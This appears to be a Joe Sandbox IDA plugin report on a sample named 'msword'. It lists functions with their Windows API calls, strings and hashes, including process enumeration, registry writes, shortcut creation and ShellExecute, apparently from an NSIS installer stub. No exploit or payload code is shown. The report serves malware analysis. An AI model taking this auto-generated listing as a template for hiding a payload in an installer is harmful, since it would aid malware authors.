String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Process32FirstW, xrefs: 004065BD
Kernel32.DLL, xrefs: 0040659B
PSAPI.DLL, xrefs: 00406464
EnumProcessModules, xrefs: 0040648A
EnumProcesses, xrefs: 00406482
Module32FirstW, xrefs: 004065D3
Unknown, xrefs: 004064FC
Process32NextW, xrefs: 004065C8
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32NextW, xrefs: 004065DE
GetModuleBaseNameW, xrefs: 00406494

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
open, xrefs: 004042DF
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

NUL, xrefs: 00406A9E
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
